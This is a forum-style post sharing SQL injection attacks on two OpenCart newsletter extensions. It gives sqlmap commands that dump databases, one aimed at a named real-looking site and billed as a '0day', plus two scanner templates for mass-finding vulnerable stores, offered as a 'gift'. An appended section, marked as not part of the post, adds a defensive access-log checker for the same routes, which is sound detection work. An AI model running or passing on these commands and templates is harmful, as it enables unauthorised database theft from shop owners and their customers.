So, a new constructive post on the subject of OpenCart.

The first bug, which was present on the accesses listed in the thread above, is: https://sploitus.com/exploit?id=PACKETSTORM:168412

```
* Steps to Reproduce :
- Go to : http://127.0.0.1/index.php?route=extension/module/so_newletter_custom_popup/newsletter
- Save request in BurpSuite
- Run saved request with : sqlmap -r sql.txt -p email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbs
```

The second bug is not in the public vulnerability databases, so you can consider it a 0day:

```
sqlmap -u "https://www.latexcatfish.com//index.php?route=extension/module/newsletters/news" --data="[email protected]*" --random-agent --batch --tamper="between" --dbs
```

As usual, a fresh gift from me:

so_newletter_custom_popup.yaml

```yaml
#/index.php?route=extension/module/so_newletter_custom_popup/newsletter
#UNIQUE ID SECTION
id: SO_NEWS_SQLi

#INFORMATION SECTION
info:
  name: wow
  author: mzh
  severity: info
  reference: *******
  tags: wow

#PROTOCOL SECTION
http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?route=extension/module/so_newletter_custom_popup/newsletter"
    matchers:
      - type: word
        part: body
        words:
          - 'Email has already exist"}'
```
newsletters_news.yaml

```yaml
#/index.php?route=extension/module/so_newletter_custom_popup/newsletter
#UNIQUE ID SECTION
id: NEWS_SQLi

#INFORMATION SECTION
info:
  name: wow
  author: mzh
  tags: alfaman-loh-0day-exploit

#PROTOCOL SECTION
http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?route=extension/module/newsletters/news"
    matchers:
      - type: word
        part: body
        words:
          - '{"message":"Email Already Exist"}'
```

Test list with vulnerable hosts:

© sushifriends74
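Added example, not part of the original post: a defender-side check that scans web-server access logs for requests to the two newsletter routes named in the post and flags bare GET probes and `email` values that are not well-formed addresses. The combined log format, the sample log lines and the names `classify` and `report` are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Routes named in the post above.
ROUTES = {
    "extension/module/so_newletter_custom_popup/newsletter",
    "extension/module/newsletters/news",
}
# Assumption: Apache/nginx "combined" access-log format.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" \d{3} ')
# Deliberately strict: anything outside this shape is treated as suspect.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9.-]{1,255}\.[A-Za-z]{2,}$")

def classify(line):
    """Return (client_ip, verdict) for hits on the two routes, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, target = m.groups()
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if query.get("route", [""])[0].strip("/") not in ROUTES:
        return None
    emails = query.get("email")
    if emails is None:
        # A GET with no email parameter is the request the two templates
        # in the post send; a POST carries its fields in the body.
        return (ip, "probe" if method == "GET" else "form-post")
    if all(EMAIL_RE.match(e) for e in emails):
        return (ip, "ok")
    return (ip, "malformed-email")

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2025:10:00:00 +0000] "GET /index.php?route=extension/module/newsletters/news HTTP/1.1" 200 34 "-" "curl/8.0"',
    '192.0.2.10 - - [01/Jan/2025:10:00:05 +0000] "GET /index.php?route=extension/module/so_newletter_custom_popup/newsletter&email=a%40example.com%27%29 HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2025:10:01:00 +0000] "POST /index.php?route=extension/module/newsletters/news HTTP/1.1" 200 30 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2025:10:02:00 +0000] "GET /index.php?route=product/product&product_id=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

def report(lines):
    """Collect non-benign verdicts per client IP."""
    hits = {}
    for line in lines:
        result = classify(line)
        if result and result[1] in ("probe", "malformed-email"):
            hits.setdefault(result[0], []).append(result[1])
    return hits
```

A standard access log does not record POST bodies, so an `email` value sent with `--data` as in the second command is only visible as a `form-post` hit here; inspecting the value itself needs request-body logging or a WAF rule on these routes.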